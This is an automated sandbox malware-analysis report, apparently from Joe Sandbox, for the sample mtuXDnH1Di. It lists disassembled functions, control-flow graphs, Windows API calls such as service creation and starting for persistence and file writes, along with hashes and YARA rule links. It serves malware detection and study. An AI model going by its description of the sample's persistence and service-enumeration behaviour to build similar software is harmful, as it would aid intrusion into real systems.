                                                                                                                                                                                                            • Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseHandle$CreateProcess
                                                                                                                                                                                                            • String ID: D$H$H
                                                                                                                                                                                                            • API String ID: 2922976086-2225610527
                                                                                                                                                                                                            • Opcode ID: 4c2cdf287489fc7ec8188ebad2148146f7b569b55f5a440401a03c01a516566e
                                                                                                                                                                                                            • Instruction ID: ada8365f708f224c5d1746546e22edc7c151adcb40b97f0835fb39d4653d6145
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4c2cdf287489fc7ec8188ebad2148146f7b569b55f5a440401a03c01a516566e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 29513171A5121CDBD744DF64FC427B63BFAF748B21F04401AE806D62B4EBB49460EB85
                                                                                                                                                                                                            Function 00ED1D90 Relevance: 4.7, APIs: 3, Instructions: 187fileCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 824 ed1d90-ed1e21 call ef5df0 call ee3110 829 ed1e4c-ed1e91 CreateFileA 824->829 830 ed1e23-ed1e4b call eefcc0 824->830 832 ed1ed1-ed1ef0 829->832 833 ed1e93-ed1ed0 call eefcc0 829->833 834 ed1f0c-ed1f18 832->834 835 ed1ef2-ed1f06 832->835 838 ed1f20-ed1f3e 834->838 835->834 840 ed1f59-ed1f85 838->840 841 ed1f40-ed1f57 838->841 842 ed1f8b-ed2063 call ecb620 call eeff30 WriteFile 840->842 841->842 842->838 847 ed2069-ed20b6 CloseHandle call eefcc0 842->847 850 ed20b8 847->850 851 ed20c2-ed20ca 847->851 850->851
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 00EE3110: WaitForSingleObject.KERNEL32(?,00004E20,?,00ECD0F2,00000128), ref: 00EE31AD
                                                                                                                                                                                                            • CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00ED1E7B
                                                                                                                                                                                                              • Part of subcall function 00EEFCC0: ReleaseMutex.KERNEL32(00ECD410,?,00ECD410,00000128), ref: 00EEFCE9
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CreateFileMutexObjectReleaseSingleWait
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1564016613-0
                                                                                                                                                                                                            • Opcode ID: db32f4edd44b61ec1ef7aca3b032377dfac11f720570e56071b582ccdfd8a1c1
                                                                                                                                                                                                            • Instruction ID: 09f1c238c0a45821197997f9845d06eae46076ac11e72c56d52a2dfca07e9fbe
                                                                                                                                                                                                            • Opcode Fuzzy Hash: db32f4edd44b61ec1ef7aca3b032377dfac11f720570e56071b582ccdfd8a1c1
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3371413560120CDFD704CF65FC89A2A3BB6FBA4314F02815AE941A32B0DB70A961FF81
                                                                                                                                                                                                            Function 00ED2EB0 Relevance: 3.0, APIs: 2, Instructions: 40memoryCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 860 ed2eb0-ed2ef9 GetProcessHeap RtlFreeHeap 861 ed2efb-ed2f07 860->861 862 ed2f30-ed2f42 860->862 863 ed2f09-ed2f19 861->863 864 ed2f1a-ed2f2f 861->864 865 ed2f44-ed2f50 862->865 866 ed2f56-ed2f57 862->866 865->866
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00ED0367,?,00ED0367,00000000), ref: 00ED2ED1
                                                                                                                                                                                                            • RtlFreeHeap.NTDLL(00000000,?,00ED0367,00000000), ref: 00ED2ED8
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$FreeProcess
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3859560861-0
                                                                                                                                                                                                            • Opcode ID: 5a4547048a7e7c6b2f2a96dbc1db343c94c7b6be050ae117867db34f4bcb16b8
                                                                                                                                                                                                            • Instruction ID: a8c201e9746559d9db5bf1fccaafd57362cef9e1271ae68659cfabb70cfbbbb0
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5a4547048a7e7c6b2f2a96dbc1db343c94c7b6be050ae117867db34f4bcb16b8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 32012B7960824CCFC314DF65FE965353BF6F798724701420AE60AAB2B1D3309895EB55
                                                                                                                                                                                                            Function 00EE45A9 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 870 ee45a9-ee45dc call ee0610 874 ee45de 870->874 875 ee45e8-ee4637 call eefde0 call ed9410 call ef1660 870->875 874->875 881 ee463c-ee4654 875->881 882 ee466d-ee4699 call eeb150 ExitProcess 881->882 883 ee4656-ee4667 881->883 883->882
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ExitProcess
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 621844428-0
                                                                                                                                                                                                            • Opcode ID: 09cd121e620a7544c3ff32f1b7e06e7377e97674aefbbff9db3646266ac141e8
                                                                                                                                                                                                            • Instruction ID: 113b037200e4e01ce5988e002af3c5481306ec5910132a94588630a77defa697
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 09cd121e620a7544c3ff32f1b7e06e7377e97674aefbbff9db3646266ac141e8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 32110475A1220ECBD710FF71FE8952637F1F7A13153015426E082E62B9EB759815FB82
                                                                                                                                                                                                            Function 00EC2800 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 886 ec2800-ec2832 call eeb150 889 ec283e-ec2842 ExitProcess 886->889 890 ec2834 886->890 890->889
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ExitProcess
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 621844428-0
                                                                                                                                                                                                            • Opcode ID: 3196dac6aa140ef1ea46b6d718afaf5324932ff6671361c7928fa85f5b93d871
                                                                                                                                                                                                            • Instruction ID: 4c4f80d94e352bef4330c9021870d35e434c705639041051a5c6f3fd8dd43b14
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3196dac6aa140ef1ea46b6d718afaf5324932ff6671361c7928fa85f5b93d871
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 75E0863C00520D8FC308DF16D89687637B6A7C5304374C41F9A152B660D635E44DDF51
                                                                                                                                                                                                            Function 00ECA4E0 Relevance: 1.3, APIs: 1, Instructions: 33stringCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 891 eca4e0-eca53a lstrlen 892 eca53c-eca548 891->892 893 eca54e-eca564 891->893 892->893
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: lstrlen
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1659193697-0
                                                                                                                                                                                                            • Opcode ID: e9b50138ab0e6cdd2ecf88f7300384c4980ba23b4c958ba5b2adcab1dd5ead4a
                                                                                                                                                                                                            • Instruction ID: c148535b02ceb4207ddb9c2705f4a60436550cda96724510db873cef27b3e0da
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e9b50138ab0e6cdd2ecf88f7300384c4980ba23b4c958ba5b2adcab1dd5ead4a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 24F0AF7160122CEFD7059F22FD0A46637BAFB993713404012E885A2179EB745825FB96

                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                            Function 00EE0D80 Relevance: 25.7, APIs: 11, Strings: 3, Instructions: 1222COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: XH$/$U][v
                                                                                                                                                                                                            • API String ID: 0-1996962770
                                                                                                                                                                                                            • Opcode ID: b0a2cf9300248b28fa393e2a1b27f6e3a606c034a0ac0c3603443c612df5ab56
                                                                                                                                                                                                            • Instruction ID: cbe0f87bfdac8801b97cea0c1c6a0be83935b3264ee718a0d5ec8a412daff1eb
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b0a2cf9300248b28fa393e2a1b27f6e3a606c034a0ac0c3603443c612df5ab56
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4BB27775A0020DCFD704EF21FD856B93BB6FB94320F11805AE946A72B4EB3159A5EF81
                                                                                                                                                                                                            Function 00EDA930 Relevance: 21.8, APIs: 11, Strings: 1, Instructions: 829memoryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HeapProcess
                                                                                                                                                                                                            • String ID: #~\
                                                                                                                                                                                                            • API String ID: 54951025-95464956
                                                                                                                                                                                                            • Opcode ID: 0f14a7ff8b49ee4d187eadd86658bd0ed28830fc4eb61aec6352567a91e704de
                                                                                                                                                                                                            • Instruction ID: 8262bad689ff011e193079c5e0aa01672e184a4ddc4949e8e0f70e34f3182357
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0f14a7ff8b49ee4d187eadd86658bd0ed28830fc4eb61aec6352567a91e704de
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5E722175A0020DCFC304EF25FD856A53BB6FB94320B11912AE841E73B0E77498A6FB91
                                                                                                                                                                                                            Function 00EE6A7B Relevance: 16.4, Strings: 12, Instructions: 1391COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: wvsprintf
                                                                                                                                                                                                            • String ID: %$0$X$d$d$d$l$l$o$p$p$x
                                                                                                                                                                                                            • API String ID: 2795597889-2884493731
                                                                                                                                                                                                            • Opcode ID: f92f6c8f449a6c116e7da17c7583849869964869bc8fcd6d93e38e0f14c7f5c0
                                                                                                                                                                                                            • Instruction ID: 9070dabbae8be345e3bf625040ac53bee3abf63df550c7025a6c7687842f72a1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f92f6c8f449a6c116e7da17c7583849869964869bc8fcd6d93e38e0f14c7f5c0
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3DD26AB5A0464DCFD704DF26FD892643BB2FBA5360B225016D881E72B4E73488A5FF85
                                                                                                                                                                                                            Function 00ED0500 Relevance: 13.7, APIs: 9, Instructions: 170serviceCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 00ED0537
                                                                                                                                                                                                            • CreateServiceA.ADVAPI32(00000000,015BFCE0,015BFCE0,000F01FF,00000110,00000002,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00ED0596
                                                                                                                                                                                                            • ChangeServiceConfig2A.ADVAPI32(00000000,00000001,?), ref: 00ED0615
                                                                                                                                                                                                            • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00ED062A
                                                                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 00ED06A7
                                                                                                                                                                                                            • OpenServiceA.ADVAPI32(00000000,015BFCE0,00000010), ref: 00ED06EB
                                                                                                                                                                                                            • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00ED072D
                                                                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 00ED073E
                                                                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 00ED07A8
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Service$CloseHandle$OpenStart$ChangeConfig2CreateManager
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3525021261-0
                                                                                                                                                                                                            • Opcode ID: 2214fe1248702ba8f81ba9057f2485effb5338c68e003484a3838755ac39b9e0
                                                                                                                                                                                                            • Instruction ID: 60df90658ae7eec91d8b4e6a17983b0f088a7cc6418ae2c137ac9eb754ed44ab
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2214fe1248702ba8f81ba9057f2485effb5338c68e003484a3838755ac39b9e0
                                                                                                                                                                                                            • Instruction Fuzzy Hash: CB61423564230CEFD3019F60FC8AB6A3BB1FBA2711F168406E941AA2B4DBB45461FF45
                                                                                                                                                                                                            Function 00ECAF20 Relevance: 7.9, APIs: 5, Instructions: 385serviceCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenSCManagerA.ADVAPI32(00000000,00000000,80000000), ref: 00ECB0AA
                                                                                                                                                                                                            • EnumServicesStatusA.ADVAPI32(00000000,00000030,00000003,?,00000024,?,?,00000000), ref: 00ECB15A
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00ECB17A
                                                                                                                                                                                                            • EnumServicesStatusA.ADVAPI32(00000000,00000030,00000003,00000000,?,?,?,00000000), ref: 00ECB216
                                                                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 00ECB41C
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: EnumServicesStatus$CloseErrorHandleLastManagerOpenService
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1579346331-0
                                                                                                                                                                                                            • Opcode ID: be5db060266a1e2c42a24536c0bb124873ca20b2c94a3ffbc3cfc4d14e99f905
                                                                                                                                                                                                            • Instruction ID: 02a1415922848d758417c2b662cf5993eb1abc3f7aa7acc23bd58be981068896
                                                                                                                                                                                                            • Opcode Fuzzy Hash: be5db060266a1e2c42a24536c0bb124873ca20b2c94a3ffbc3cfc4d14e99f905
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 91F166B6A0120DDFC704DF65FD86B6A3BB6F794320F114019E942E32B4E73598A5EB81
                                                                                                                                                                                                            Function 00EF50E0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 134timeCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetSystemTime.KERNEL32(}$,00000001,?,?,00EE247D), ref: 00EF518C
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00EF52BE
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
